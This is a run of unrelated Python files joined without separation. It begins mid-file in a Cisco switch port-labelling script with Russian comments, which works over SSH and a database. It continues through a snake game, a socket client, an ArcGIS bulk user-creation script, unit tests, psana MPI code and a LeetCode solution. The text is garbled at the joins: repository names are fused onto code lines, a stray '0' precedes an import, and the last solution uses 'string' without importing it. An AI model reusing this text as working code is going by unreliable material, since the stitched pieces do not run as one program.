data_from_f,)) else: # Проверяем сколько записей в БД с таким маком как полученным из файла # Если записей больше чем одна, if (len(data_from_db) > 1): # то удаляем все старые записи и оставляем самую свежую clear_dublicate_mac(data_from_f[3]) # Проверяем даты последнего апдейта и обновляем if (date_to_second(data_from_f[0]) > date_to_second(data_from_db[0][1])): print("Update - {} - {}".format(data_from_f, data_from_db[0][0])) update_data_to_db(''' UPDATE tb_mac_from_files SET date_from_file = ?, dns_name = ?, ip_addr = ?, mac_addr = ?, fio = ?, username = ?, os = ? 
WHERE id_mac_from_file = ?''', ( data_from_f[0], data_from_f[1], data_from_f[2], data_from_f[3], data_from_f[4], data_from_f[5], data_from_f[6], data_from_db[0][0])) clear_dublicate_mac(data_from_f[3]) return 0 def clear_dublicate_mac(mac_addr): ''' :param mac_addr: :return: ''' # получаем из БД (tb_mac_from_files) строку содержащую mac-адрес из файла data_from_dbs = get_select_in_db_exp( "select * from tb_mac_from_files where mac_addr=:mac_addr", {"mac_addr": mac_addr, }) tmp_date = '2000-01-01 00:00:01' tmp_id = 0 if (len(data_from_dbs) > 1): for data_from_db in data_from_dbs: print(data_from_db) if (tmp_id != data_from_db[0]): if (date_to_second(tmp_date) < date_to_second(data_from_db[1])): if (tmp_id != 0): delete_data_from_db("tb_mac_from_files", "id_mac_from_file = " + str(tmp_id)) print("Delete - {} - {}".format(tmp_id, tmp_date)) tmp_id = data_from_db[0] tmp_date = data_from_db[1] else: delete_data_from_db("tb_mac_from_files", "id_mac_from_file = " + str(data_from_db[0])) print("Delete - {} - {}".format(data_from_db[0], data_from_db[1])) print("Result - {} - {}".format(tmp_id, tmp_date)) print("\n") return 0 # ---------------------------------------------------------------------------------------------------------------------- # 3 Блок по записи данных о mac адресах с устройств cisco в БД def update_desc_in_db(switch): ''' обновление подписей в БД с коммутатора :return: ''' # получаем данные о подписи портов на коммутаторах datas = sis_parser(switch[2]) # обновляем подписи в БД for data in datas: update_data_to_db("UPDATE tb_desc_on_switches SET descs = ? WHERE id_switch = ? and port_name = ?", (data[2], data[0], data[1])) return 0 def update_autodesc(switch): ''' !!! New Функция проверяющая корректность ключа поля auto_descs в таблице tb_desc_on_switches ''' # обновляем подписи на коммутаторе update_desc_in_db(switch) # Получаем строки подписей на текущем коммутаторе из БД lports = get_select_in_db_exp(''' SELECT * FROM tb_desc_on_switches WHERE id_switch = :switch_id ''', {"switch_id": switch[0], }) if (lports is not None): # !!! Этот блок можно переписать и справочные слова брать из БД # для каждой строки проверяем описание и если в нем встречаются знакомые слова, то for lport in lports: # в этом случае ставим флаг auto_descs = 1 lallows = get_select_in_db_ex("SELECT * FROM tb_auto_desc_allow") ldenys = get_select_in_db_ex("SELECT * FROM tb_auto_desc_deny") flag = -1 for lallow in lallows: if (lport[3].lower().find(lallow[0]) != -1): flag = 1 for ldeny in ldenys: if (lport[3].lower().find(ldeny[0]) != -1): flag = 0 if (flag != -1): update_data_to_db("UPDATE tb_desc_on_switches SET auto_descs = ? 
WHERE id_desc_on_switch = ?", (flag, lport[0])) else: print("Что-то явно пошло не так как задумывалось в функции update_autodesc") # return ничего не делает return 0 def set_new_desc_to_db(): ''' :return: ''' print("switches = ", sw_list) # для каждого коммутатора for switch in sw_list: # запрашиваем в БД список портов, которые можно подписывать lports = get_select_in_db_exp(''' SELECT * FROM tb_desc_on_switches WHERE id_switch = :switch_id AND auto_desc = 1 ''', {"switch_id": switch[0], }) print("\nswitch = ", switch) # Если записей в БД о портах которые можно подписывать нет, if (lports is None): # то проверяем есть ли записи о портах этого коммутатора вообще в БД tports = get_select_in_db_exp(''' SELECT * FROM tb_desc_on_switches WHERE id_switch = :switch_id ''', {"switch_id": switch[0], }) # Если записей о портах этого коммутатора нет в БД, то if (tports is None): # считываем с коммутатора все строки по команде "sis" и # записываем в БД подписи с коммутаторов insert_data_to_db('''INSERT INTO tb_desc_on_switches (id_switch, port_name, descs, auto_desc) VALUES(?, ?, ?, ?)''', sis_parser(switch[2])) # Если записи в БД о портах которые можно подписать есть, else: # получаем данные с текущего коммутатора об активных mac адресах switch_datas = ssh_command(switch[2], 'show mac- | inc Fa0') # создаем массив с активными маками на портах, которые можно подписывать act_macs = [] # пробегаемся по mac адресам for switch_data in switch_datas: print("switch_data - ", switch_data) # флаг - найден порт из списка активных маков среди разрешенных для подписи портов из БД flag = 0 # если в списке мак таблицы есть порты, которые можно подписывать for lport in lports: # сравниваем название портов, чтобы понять есть ли в списке порт для подписи if (switch_data.split()[3] == lport[2]): flag = 1 # то добавляем в результирующую таблицу if (flag == 1): act_macs.append(switch_data.split()) print("act_macs = ", act_macs) # на выходе получаем массив act_macs = [['254', '0011.2f38.7d84', 'DYNAMIC', 'Fa0/1'], # ['254', '001f.c689.7e49', 'DYNAMIC', 'Fa0/12']] # 21 5 00C0B79FC589 Fa0/15 254 # c мак адресами и портами которые необходимо подписать for act_mac in act_macs: for lport in lports: # ищем порт среди act_mac для того чтобы сравнить дескрипшин if (act_mac[3] == lport[2]): # db_mac_sw = get_select_in_db_exp(''' SELECT * FROM tb_mac_from_switches WHERE mac_addr = :mac_addr ''', {"mac_addr": get_win_mac(act_mac[1])}) # если данных о маке текущего порта есть, if (db_mac_sw is not None): # проверяем, что в базе такая запись есть и совпадает полностью if not (get_win_mac(act_mac[1]) == db_mac_sw[0][2] and act_mac[3] == db_mac_sw[0][3]): print("--------act_mac, db_mac_sw === {} == {}".format(act_mac, db_mac_sw)) # если данные о маке текущего порта отсутствуют else: del act_mac[2] act_mac.insert(0, switch[0]) act_mac.insert(1, get_win_mac(act_mac[2])) del act_mac[3] print("Insert = ", act_mac) update_data_to_db(''' INSERT INTO tb_mac_from_switches (id_switch, mac_addr, vlan, port_name) VALUES(?, ?, ?, ?)''', act_mac) # проверяем корректность update_autodesc(switch) # ---------------------------------------------------------------------------------------------------------------------- # Попытка № 3 def sis_parser(ip_switch): datas = ssh_command(ip_switch, "sis") i = 0 l = [] for data in datas: port = data[0:10].strip(' ') # print (port.encode('ascii')) if port == "Port" or port == '\r\n': next else: l.append([]) l[i].append( str(get_select_in_db_exp("SELECT id_switch FROM tb_switches WHERE ip_addr=?", 
(str(ip_switch),))[0][0])) l[i].append(data[0:10].strip(' ')) # name = d[10:29].strip(' ') l[i].append(data[10:29].strip(' ')) l[i].append("0") # status = d[29:42].strip(' ') # l[i].append(data[29:42].strip(' ')) # vlan = d[42:53].strip(' ') # l[i].append(data[42:53].strip(' ')) # duplex = d[53:60].strip(' ') # l[i].append(data[53:60].strip(' ')) # speed = d[60:67].strip(' ') # l[i].append(data[60:67].strip(' ')) # type_p = d[67:].strip(' ') # l[i].append(data[67:].strip(' ')) # id_port_name = get_id_port_name(port) # l[i].append(get_id_host (ip_switch)) # id_host = get_id_host (ip_switch) # print(l[i]) # print (str(i) + " - " + port + "; id-port = " + str(id_port_name) + "; desc = " + name) i += 1 return l def update_desc_in_db2(switch): ''' обновление подписей в БД с коммутатора :return: ''' # получаем данные о подписи портов на коммутаторах datas = sis_parser(switch[2]) # получаем данные о подписях в БД lports = get_select_in_db_exp(''' SELECT * FROM tb_desc_on_switches WHERE id_switch = :switch_id ''', {"switch_id": switch[0], }) # print("lports - ", lports) # если подписи портов есть в БД, то делаем обнолвение полей if len(lports) > 0: # обновляем подписи в БД for data in datas: update_data_to_db(''' UPDATE tb_desc_on_switches SET descs = ?, f_new_desc = ? WHERE id_switch = ? and port_name = ?''', (data[2], "0", data[0], data[1])) else: # если подписи портов не записаны в БД, то вставляем новые строки insert_data_to_db('''INSERT INTO tb_desc_on_switches (id_switch, port_name, descs, auto_desc) VALUES(?, ?, ?, ?)''', sis_parser(switch[2])) return 0 def check_port_for_auto_desc(): ''' :param tlfi: :return: ''' return 0 def update_mac_in_db(switch): ''' :param switch: :return: ''' # получаем данные с текущего коммутатора об активных mac адресах sw_lmacs = ssh_command(switch[2], 'show mac- | inc Fa0') # list for insert lfi = [] for sw_lmac in sw_lmacs: # temp list for insert tlfi = [] tlfi.append(switch[0]) tlfi.append(get_win_mac(sw_lmac.split()[1])) tlfi.append(sw_lmac.split()[3]) tlfi.append(sw_lmac.split()[0]) tlfi.append("1") if check_port_for_auto_desc(tlfi): lfi.append(tlfi) print("lfi - ", lfi) # получаем данные из БД о имеющихся mac адресах db_lmacs = get_select_in_db_exp(''' SELECT * FROM tb_mac_from_switches WHERE id_switch = :switch_id ''', {"switch_id": switch[0], }) # print("db_lmacs - ", db_lmacs) return 0 def update_switch_data_in_db(): ''' Главная функция выполняющая все действия блока :return: ''' # Пробегаемся по коммутаторам for switch in sw_list: print("\nswitch - ", switch) # Обновляем данные sis update_desc_in_db2(switch) # Обновляем данные sma update_mac_in_db(switch) return 0 # ---------------------------------------------------------------------------------------------------------------------- # 4 Блок по подготовке новых подписей для устройств def get_new_description_from_port(datas): ''' функция получает массив списков по формату представления vw_summary и преобразовывает старые подписи в новые для дальнейшей записи их в БД data[1] - id_switch data[3] - имя порта (номер порта в формате Fa0/1) data[7] - текущая подпись порта data[11] - последнее название АРМ зарегистрированное с отображаемым мак адресом в папке transit data[18] - ip-адрес коммутатора data[19] - статус коммутатора (включен или выключен) data[20] - ключ по которому определяем можно производить автоподпись портов или нет ''' i = 0 # создаем список l = [] # получаем список списков коммутаторов for data in datas: # print("{} - {}".format(data[20], data)) # проверяем, что данный коммутатор можно 
подписывать автоматически if data[20]: # проверяем, что на порту нет надписи Хаб if data[7].lower().find('hub') < 0: # проверяем, что порт подписан в нужном формате с разделителем "|" # (<номер кабинета>-<номер розетки в помещении>|<АРМ>) if len(data[7].split('|')) > 1: # проверяем что имя АРМ не совпадает и подписываем, иначе порт считаем подписанным верно if data[7].split('|')[1] != data[11]: room = data[7].split('|')[0] + '|' + data[11] # иначе все подписано верно else: room = data[7] # если порт имеет произвольную подпись, то else: # ищем совпадение по формату (r.303-1r Y) result = re.findall(r'(\b[r](\b[\.])*\d{3}(\b[-]\d{1})*([r|l|R|L])*([ Y])*)', data[7]) # Если нашли совпадение по формату, то if len(result): # приводим номер помещение к общему виду room = result[0][0].lstrip('r').strip().strip('.').upper() # если помещение не дописано и имеет только 3 цифры, то if len(room) <= 3: # дописываем -??, что бы получить общий вормат room = room + '-00' # заносим данные в таблицу БД room = room + '|' + str(data[11]) # если совпадение по формату не нейдено else: # ищем более свежий формат состоящий из 3х первых цифр result = re.findall(r'(\d{3}\b[-]\d{1}[r|l|R|L])+(\b[./]\d{1})*', data[7]) # проверяем, что нашли новый формат if len(result): # состоит он только из цифр if len(result[0][0]) > 0: room = result[0][0] # или ему еще можно подписать номер розетки if len(result[0][1]) > 0: room = room + str(result[0][1]) # заносим данные в таблицу БД room = room + '|' + str(data[11]) # если ничего не нашли по номерам помещений то вносим формат из нулей else: # заносим данные в таблицу БД room = '000-00|' + str(data[11]) # если хаб присутствует, то else: # текущую подпись порта переводим в верхний регистр room = data[7].upper() # создаем внутри списка вложенные списки со строками l.append([]) # id_switch l[i].append(data[1]) # имя порта который мы хотим подписать l[i].append(data[3]) # ip-адрес коммутатора l[i].append(data[18]) # статус коммутатора (включен или выключен) # l[i].append(data[19]) # ключ по которому определяем можно производить автоподпись портов или нет # l[i].append(data[20]) # новая подпись l[i].append(room) i += 1 return l # ---------------------------------------------------------------------------------------------------------------------- # 5 Блок по внесению новых подписей на коммутаторы def put_new_descr_switch(): ''' Функция проверяет таблицу tb_new_desc на наличие новых подписей коммутаторов и вносит изменения в коммутатор ''' # получаем список коммутаторов datas = get_select_in_db_ex(''' SELECT id_switch, ip_addr, count(id_switch) FROM tb_new_desc GROUP BY id_switch''') for data in datas: print("\n---" + str(data) + "---") ssh_commands(data[1], get_commond_line(data)) def get_commond_line(switch): ''' Функция подготавливает массив комманд для конкретного коммутатора ''' qs = get_select_in_db_exp(''' SELECT *, count(port_name) FROM tb_new_desc WHERE id_switch=? GROUP BY id_switch, port_name''', (switch[0],)) print("qs - {}".format(qs)) l = [] l.append("conf ter") for q in qs: if q[6] < 2: l.append("int " + q[2]) l.append("desc " + q[4]) l.append("exit") if len(l) > 1: l.append("exit") l.append("wr") l.append("exit") # очищаем БД от записей, которые передаем на подпись коммутаторов for q in qs: print("Удаляем строку - {}".format(q)) update_data_to_db("UPDATE tb_new_desc SET f_new_desc = ? 
WHERE id_new_desc = ?", ("1", q[0])) # delete_data_from_db("tb_new_desc", "id_new_desc = " + str(q[0])) return l # ---------------------------------------------------------------------------------------------------------------------- # -------------------------------------------------------MAIN # ---------------------------------------------------------------------------------------------------------------------- # ---------------------------------------------------------------------------------------------------------------------- # 1--- Блок по сканированию сети и записи IP адресов cisco в БД print(" - Сканирую подсеть " + str(ip_range)) # получаем список ip-адресов доступных по ICMP из диапазона ip_range ip_range_online = my_ping(ip_range) # отсеиваем все устройства, кроме cisco ip_cisco_online = find_cisco_ip(ip_range_online) # записываем в БД все IP адреса устройств, которые отозвались как cisco insert_ip_cisco_in_db(ip_cisco_online) # получаем список коммутаторов с которыми в дальнейшем будем работать print("Получаем из БД список коммутаторов с которыми будем работать ") # sw_list = get_select_in_db_ex("SELECT * FROM tb_switches WHERE status = 1 and auto_desc = 1") sw_list = get_select_in_db_ex("SELECT * FROM tb_switches WHERE status = 1 and auto_desc = 1 and id_switch = 2") print(sw_list) ltada = get_select_in_db_ex("SELECT * FROM tb_auto_desc_allow") ltadd = get_select_in_db_ex("SELECT * FROM tb_auto_desc_deny") # ---------------------------------------------------------------------------------------------------------------------- # 2--- Блок по записи данных о mac адресах, из лог файлов входа в систему, в БД # print("\n --- Модуль 2 - считывание лог файлов") # print(" - Сканирую файлы логов из папки " + str(dirName)) # set_datas_from_file() # Обновление учетных данных коммутатора (серийный номер, имя, версия прошивки) # insert_cisco_sign_db() # ---------------------------------------------------------------------------------------------------------------------- # 3--- Блок по считыванию подписей и mac адресов с портов cisco в БД print("\n --- Модуль 3 - считывание подписей и mac адресов") # Считываем данные с коммутаторов и обновляем подписи портов в БД. 
update_switch_data_in_db() # ----------------------------------------------- # set_new_desc_to_db() # ---------------------------------------------------------------------------------------------------------------------- # 4--- Блок по сравнению данных в БД о подписях устройств и внесение новых подписей # print("\n --- Модуль 4 - подготовка данных для подписи портов на коммутатороах") # datas = get_new_description_from_port(get_select_in_db_ex("SELECT * FROM vw_summary")) # insert_data_to_db("INSERT INTO tb_new_desc (id_switch, port_name, ip_addr, descs) VALUES(?, ?, ?, ?)", datas) # Чистим дубли по подписям портов # set_query_for_db( ''' delete from tb_new_desc where id_new_desc in ( SELECT id_new_desc FROM vw_dup_desc ) ''' # ) # ---------------------------------------------------------------------------------------------------------------------- # 5--- Блок по внесению новых подписей на коммутаторы # print("\n --- Модуль 5 - подпись портов коммутаторов") # put_new_descr_switch() import pygame, random from pygame.rect import Rect class Snake(): def __init__(self, x, y, width, dir): self.moved = False self.length = 3 self.width = width self.color = (0, 255, 0) self.dir = (1, 0) self.pos = [[x, y], [x-self.width, y], [x-(self.width*2), y]] def draw(self, screen): for i in range(self.length): pygame.draw.rect(screen, self.color,(self.pos[self.length - 1 - i][0], self.pos[self.length - 1 - i][1], self.width, self.width)) def move(self, screen): prev_move = [self.pos[0][0], self.pos[0][1]] self.pos[0][0] += self.dir[0] * self.width self.pos[0][1] += self.dir[1] * self.width self.moved = True if not 0 - self.width < self.pos[0][0] < screen.get_width() or not 0 - self.width < self.pos[0][1] < screen.get_height(): return True for i in range(self.length): if self.pos[self.length - 1 - i] != self.pos[1]: if self.pos[self.length - 1 - i] != self.pos[0]: self.pos[self.length - 1 - i] = self.pos[self.length - 2 - i] else: if self.pos[0] != self.pos[1]: self.pos[1] = prev_move else: return True if self.length - 1 - i != 0 and self.pos[0] == self.pos[self.length - 1 - i]: return True return False def turn(self, dir): if self.dir != (-dir[0], -dir[1]) and self.moved: self.dir = dir self.moved = False def eat(self): self.pos += [[self.pos[self.length - 1][0] - self.dir[0] * self.width, self.pos[self.length - 1][1] - self.dir[1] * self.width]] self.length += 1koravel/friends_displayer import os __root_location = os.path.dirname(os.path.abspath(__file__)) def get_root_location(): return __root_location GoodAI/distributed_es import tempfile from pathlib import Path class TempFile(tempfile.TemporaryDirectory): """Creates context with temp file name in a temporary directory, deletes the dir after exiting the context returns the file """ def __init__(self, filename: str): super().__init__() self.file = Path(self.name) / filename def __enter__(self): super().__enter__() return self.file def __exit__(self, exc, value, tb): super().__exit__(exc, value, tb) class TempFileName(TempFile): """Creates context with temp file name in a temporary directory, deletes the dir after exiting the context returns name of the file """ def __enter__(self): return str(super().__enter__())#! 
/usr/bin/python
# -*- coding: utf-8 -*-
"""My general client framework."""
import threading
import socket

from message import Message
import network_utils as nu


class GameClient:
    def __init__(self, server_address):
        self.server_address = server_address
        self.observers = []
        self._running = threading.Event()
        try:
            self.socket = socket.create_connection(server_address)
        except ConnectionError as e:
            print(f'| [Client] {e}')
            print(f'| [Client] cannot connect to server {self.server_address}')
            return
        else:
            print(f'| [Client] connected to server {self.server_address}')
        self.client_address = self.socket.getsockname()
        self.receiver_thread = threading.Thread(target=self._receiver_main)
        self._running.set()
        self.receiver_thread.start()

    def send_message(self, msg: Message):
        if not self.running:
            return
        msg_bytes = msg.to_bytes()
        try:
            nu.send_message(self.socket, msg_bytes)
        except ConnectionError as e:
            print(e)
            self.shutdown()

    def register_observer(self, observer):
        self.observers.append(observer)

    @property
    def running(self):
        return self._running.is_set()

    def _receiver_main(self):
        while self.running:
            try:
                resp_data = nu.recv_message(self.socket)
            except ConnectionError as e:
                print(f'| [Client] {e}')
                break
            resp = Message.from_bytes(resp_data)
            for observer in self.observers:
                observer(resp)
        print(f'| [Client] client receiver stopped')

    def shutdown(self):
        self._running.clear()
        self.socket.close()
        print(f'| [Client] disconnected from server {self.server_address}')


class StatefulGameClient(GameClient):
    def __init__(self, server_address, state):
        super().__init__(server_address)
        self.state = state
        self.register_observer(self.update_client_state)

    def update_client_state(self, resp):
        self.state.update_client(resp)


# Requires admin role.
import csv, time, sys, arcpy
from agoTools.admin import Admin

adminAccount = arcpy.GetParameterAsText(0)
adminPassword = arcpy.GetParameterAsText(1)
className = arcpy.GetParameterAsText(2)
classSnippet = arcpy.GetParameterAsText(3)
csvFile = arcpy.GetParameterAsText(4)
userPrefix = arcpy.GetParameterAsText(5)
userPassword = arcpy.GetParameterAsText(6)
userRole = arcpy.GetParameterAsText(7)
instructorAccount = arcpy.GetParameterAsText(8)
provider = "arcgis"

if not adminAccount:
    adminAccount = "your ago account"
if not adminPassword:
    adminPassword = ""
if not className:
    className = "Sample Class"
if not classSnippet:
    classSnippet = "Snippet goes here"
if not csvFile:
    csvFile = r"C:\students.csv"
if not userPrefix:
    userPrefix = "labUser_"
if not userPassword:
    userPassword = ""
if not userRole:
    userRole = "account_user"
if not provider:
    provider = "arcgis"

##Unicode is not encoding properly so convert all arcpy params
## (fix: the two password conversions below originally dropped the value being converted)
adminAccount = str(adminAccount)
adminPassword = str(adminPassword)
className = str(className)
classSnippet = str(classSnippet)
userPrefix = str(userPrefix)
userPassword = str(userPassword)
userRole = str(userRole)
provider = str(provider)

arcpy.AddMessage("Logging in...")
try:
    agoAdmin = Admin(adminAccount, password=adminPassword)  # fix: pass the admin password collected above
except:
    arcpy.AddError("Login failed. Please re-enter your admin username and password.")
    sys.exit()

##Get roles from the portal so we can translate the user-entered name to the role id that the api needs.
##Also confirm that the user-entered role is valid.
allRoles = agoAdmin.getRoles() ##getRoles doesn't return predefined system roles, so we'll add those roles = {'Administrator':'org_admin', 'Publisher':'org_publisher', 'Author':'org_author', 'User':'org_viewer'} for role in allRoles: roles[role["name"]] = role["id"] if not userRole in roles.keys(): arcpy.AddError(userRole + " is not a valid role.") sys.exit() roleId =roles[userRole] arcpy.AddMessage("Creating Group...") print "Creating Group..." group = agoAdmin.createGroup(className,classSnippet) description = "Lab account for " + className if "group" in group: groupId = group["group"]["id"] arcpy.AddMessage("Creating Users...") print "Creating Users..." i = 1 users = [] sameNameCounter = 1 with open(csvFile,"rb") as userFile: rows = csv.reader(userFile) for row in rows: userFirstName = row[0] userLastName = row[1] userEmail = row[2] username = userPrefix + "_" + userLastName if username in users: username += "_" + str(sameNameCounter) sameNameCounter +=1 arcpy.AddMessage("creating " + username + "...") print "creating " + username + "..." agoAdmin.createUser(username,userPassword,userFirstName,userLastName,userEmail,description,roleId,provider) users.append(username) arcpy.AddMessage("Adding New Users to Group...") print "Adding Users to Group..." agoAdmin.addUsersToGroups(users,[groupId]) if instructorAccount: arcpy.AddMessage("Reassigning group ownership to " + instructorAccount + "...") print "Reassigning group ownership to " + instructorAccount + "..." agoAdmin.reassignGroupOwnership(groupId,instructorAccount) print "Done" else: arcpy.AddError("Failed to create group") arcpy.AddError(group["error"]["details"]) print "Failed to create group: " + group["error"]["details"] # !/usr/bin/python # coding=utf-8 from __future__ import (absolute_import, division, print_function, unicode_literals) from unittest import TestCase from misc_filename_utils.funcs import get_safe_path_name, get_filename_from_url class SafePathTestCase(TestCase): def test_safe_path_name(self): test_data = [ ("ABC.pdf", "abc.pdf"), ("čřž", "crz"), ("&&", ""), ("A-B-C.DOCx", "a-b-c.docx"), ] for unsafe_filename, expected in test_data: self.assertEqual(get_safe_path_name(unsafe_filename), expected) class FilenameFromUrlTestCase(TestCase): def test_filename_from_url(self): test_data = [ ("http://www.example.com/foo.pdf", "foo.pdf"), ("http://example.com/foo/bar/foo-bar.jpg?h600", "foo-bar.jpg"), ("fooBar.JPG", "fooBar.jpg"), ("\n\n\n\t\t\tfooBar.JPG \n\t ", "fooBar.jpg"), ] for url, expected_filename in test_data: self.assertEqual(get_filename_from_url(url), expected_filename) books/debugging/better_exceptions/test_better_exceptions_django/test_better_exceptions_django/fm.py import logging from better_exceptions import format_exception class ExceptionFormatter(logging.Formatter): def formatException(self, ei): return format_exception(*ei) juanCastrillo/gluon2pytorch import torch import mxnet as mx import numpy as np from gluon2pytorch import gluon2pytorch class PadTest(mx.gluon.nn.HybridSequential): def __init__(self, pad_type, pad=0): super(PadTest, self).__init__() from mxnet.gluon import nn with self.name_scope(): self.conv1 = nn.Conv2D(3, 32) self.relu = nn.Activation('relu') self.pad_type = pad_type self.pad = pad def hybrid_forward(self, F, x): x = F.pad(self.relu(self.conv1(x)), self.pad_type, (0, 0, 0, 0, self.pad, self.pad, self.pad, self.pad), constant_value=0) return x def check_error(gluon_output, pytorch_output, epsilon=1e-5): pytorch_output = pytorch_output.data.numpy() gluon_output = gluon_output.asnumpy() 
error = np.max(pytorch_output - gluon_output) print('Error:', error) assert error < epsilon return error if __name__ == '__main__': print('Test pad:') for pad_type in ['reflect', 'edge', 'constant']: for pad in [0, 1, 2, 10, 20]: net = PadTest(pad_type=pad_type, pad=pad) # Make sure it's hybrid and initialized net.hybridize() net.collect_params().initialize() pytorch_model = gluon2pytorch(net, [(1, 3, 224, 224)], dst_dir=None, pytorch_module_name='PadTest') pytorch_model.eval() input_np = np.random.uniform(-1, 1, (1, 3, 224, 224)) gluon_output = net(mx.nd.array(input_np)) pytorch_output = pytorch_model(torch.FloatTensor(input_np)) check_error(gluon_output, pytorch_output) import sys import os import numpy as np from psana.psexp import * from psana import dgram from psana.event import Event from psana.dgrammanager import DgramManager from psana.smalldata import SmallData import time import logging logger = logging.getLogger(__name__) from psana.psexp.tools import mode if mode == 'mpi': from mpi4py import MPI class InvalidEventBuilderCores(Exception): pass nodetype = None class RunParallel(Run): """ Yields list of events from multiple smd/bigdata files using > 3 cores.""" def __init__(self, ds, run_evt): super(RunParallel, self).__init__(ds) self.ds = ds self.comms = ds.comms self._evt = run_evt self.beginruns = run_evt._dgrams self.configs = ds._configs self._get_runinfo() super()._setup_envstore() def events(self): evt_iter = self.start() for evt in evt_iter: if evt.service() != TransitionId.L1Accept: continue st = time.time() yield evt en = time.time() self.c_ana.labels('seconds','None').inc(en-st) self.c_ana.labels('batches','None').inc() def steps(self): evt_iter = self.start() for evt in evt_iter: if evt.service() == TransitionId.BeginStep: yield Step(evt, evt_iter) def start(self): """ Request data for this run""" if nodetype == 'smd0': self.ds.smd0.start() elif nodetype == 'eb': self.ds.eb_node.start() elif nodetype == 'bd': for evt in self.ds.bd_node.start(): yield evt elif nodetype == 'srv': return def safe_mpi_abort(msg): print(msg) sys.stdout.flush() # make sure error is printed MPI.COMM_WORLD.Abort() class MPIDataSource(DataSourceBase): def __init__(self, comms, *args, **kwargs): super(MPIDataSource, self).__init__(**kwargs) self.comms = comms comm = self.comms.psana_comm # todo could be better rank = comm.Get_rank() size = comm.Get_size() global nodetype nodetype = self.comms.node_type() self.smd_fds = None # prepare comms for running SmallData PS_SRV_NODES = int(os.environ.get('PS_SRV_NODES', 0)) if PS_SRV_NODES > 0: self.smalldata_obj = SmallData(**self.smalldata_kwargs) else: self.smalldata_obj = None # check if no. of ranks is enough nsmds = int(os.environ.get('PS_EB_NODES', 1)) # No. of smd cores if not (size > (nsmds + 1)): msg = f"""ERROR Too few MPI processes. MPI size must be more than no. of all workers. 
\n\tTotal psana size:{size} \n\tPS_EB_NODES: {nsmds}""" safe_mpi_abort(msg) # can only have 1 EventBuilder when running with destination if self.destination and nsmds > 1: msg = 'ERROR Too many EventBuilder cores with destination callback' safe_mpi_abort(msg) # setup runnum list if nodetype == 'smd0': super()._setup_runnum_list() else: self.runnum_list= None self.xtc_path = None self.runnum_list = comm.bcast(self.runnum_list, root=0) self.xtc_path = comm.bcast(self.xtc_path, root=0) self.runnum_list_index = 0 self._start_prometheus_client(mpi_rank=rank) self._setup_run() def __del__(self): if nodetype == 'smd0': super()._close_opened_smd_files() self._end_prometheus_client(mpi_rank=self.comms.psana_comm.Get_rank()) def _setup_configs(self): """ Creates and broadcasts configs only called by _setup_run() """ g_ts = self.prom_man.get_metric("psana_timestamp") if nodetype == 'smd0': super()._close_opened_smd_files() self.smd_fds = np.array([os.open(smd_file, os.O_RDONLY) for smd_file in self.smd_files], dtype=np.int32) logger.debug(f'mpi_ds: smd0 opened smd_fds: {self.smd_fds}') self.smdr_man = SmdReaderManager(self.smd_fds, self.dsparms) self._configs = self.smdr_man.get_next_dgrams() super()._setup_det_class_table() super()._set_configinfo() g_ts.labels("first_event").set(time.time()) nbytes = np.array([memoryview(config).shape[0] for config in self._configs], \ dtype='i') else: self._configs = None nbytes = np.empty(len(self.smd_files), dtype='i') self.comms.psana_comm.Bcast(nbytes, root=0) # no. of bytes is required for mpich if nodetype != 'smd0': self._configs = [np.empty(nbyte, dtype='b') for nbyte in nbytes] for i in range(len(self._configs)): self.comms.psana_comm.Bcast([self._configs[i], nbytes[i], MPI.BYTE], root=0) if nodetype != 'smd0': self._configs = [dgram.Dgram(view=config, offset=0) for config in self._configs] g_ts.labels("first_event").set(time.time()) self._setup_det_class_table() self._set_configinfo() def _setup_run(self): if self.runnum_list_index == len(self.runnum_list): return False runnum = self.runnum_list[self.runnum_list_index] self.runnum_list_index += 1 if nodetype == 'smd0': super()._setup_run_files(runnum) super()._apply_detector_selection() else: self.xtc_files = None self.smd_files = None self.dsparms.use_smds = None self.xtc_files = self.comms.psana_comm.bcast(self.xtc_files, root=0) self.smd_files = self.comms.psana_comm.bcast(self.smd_files, root=0) self.dsparms.use_smds = self.comms.psana_comm.bcast(self.dsparms.use_smds, root=0) self._setup_configs() self.dm = DgramManager(self.xtc_files, configs=self._configs, found_xtc2_callback=super().found_xtc2_callback) if nodetype == 'smd0': self.smd0 = Smd0(self.comms, self._configs, self.smdr_man, self.dsparms) elif nodetype == 'eb': self.eb_node = EventBuilderNode(self.comms, self._configs, self.dsparms, self.dm) elif nodetype == 'bd': self.bd_node = BigDataNode(self.comms, self._configs, self.dsparms, self.dm) return True def _setup_beginruns(self): """ Determines if there is a next run as 1) New run found in the same smalldata files 2) New run found in the new smalldata files """ while True: if nodetype == 'smd0': dgrams = self.smdr_man.get_next_dgrams() nbytes = np.zeros(len(self.smd_files), dtype='i') if dgrams is not None: nbytes = np.array([memoryview(d).shape[0] for d in dgrams], dtype='i') else: dgrams = None nbytes = np.empty(len(self.smd_files), dtype='i') self.comms.psana_comm.Bcast(nbytes, root=0) if np.sum(nbytes) == 0: return False if nodetype != 'smd0': dgrams = [np.empty(nbyte, dtype='b') for 
nbyte in nbytes] for i in range(len(dgrams)): self.comms.psana_comm.Bcast([dgrams[i], nbytes[i], MPI.BYTE], root=0) if nodetype != 'smd0': dgrams = [dgram.Dgram(view=d, config=config, offset=0) \ for d, config in zip(dgrams,self._configs)] if dgrams[0].service() == TransitionId.BeginRun: self.beginruns = dgrams return True # end while True def _setup_run_calibconst(self): if nodetype == 'smd0': super()._setup_run_calibconst() else: self.dsparms.calibconst = None self.dsparms.calibconst = self.comms.psana_comm.bcast(self.dsparms.calibconst, root=0) def _start_run(self): if self._setup_beginruns(): # try to get next run from current files self._setup_run_calibconst() return True elif self._setup_run(): # try to get next run from next files if self._setup_beginruns(): self._setup_run_calibconst() return True def runs(self): while self._start_run(): run = RunParallel(self, Event(dgrams=self.beginruns)) yield run 0 from cgr_gwas_qc.workflow.scripts import trim_ped_map_ids def test_trim_ped_ids(fake_data_cache): filename = fake_data_cache / "plink/samples.ped" trimmed = trim_ped_map_ids.trim_ped_ids(filename, 2) row = next(trimmed) columns = row.split(" ") assert 2 == len(columns[0]) assert 2 == len(columns[1]) def test_trim_map_ids(fake_data_cache): filename = fake_data_cache / "plink/samples.map" trimmed = trim_ped_map_ids.trim_map_ids(filename, 2) row = next(trimmed) columns = row.split("\t") assert 2 == len(columns[1]) class Solution: def customSortString(self, S: str, T: str) -> str: ans = "" count = [0] * 26 for c in T: count[ord(c) - ord('a')] += 1 for c in S: while count[ord(c) - ord('a')] > 0: ans += c count[ord(c) - ord('a')] -= 1 for c in string.ascii_lowercase: for _ in range(count[ord(c) - ord('a')]): ans += c return ans 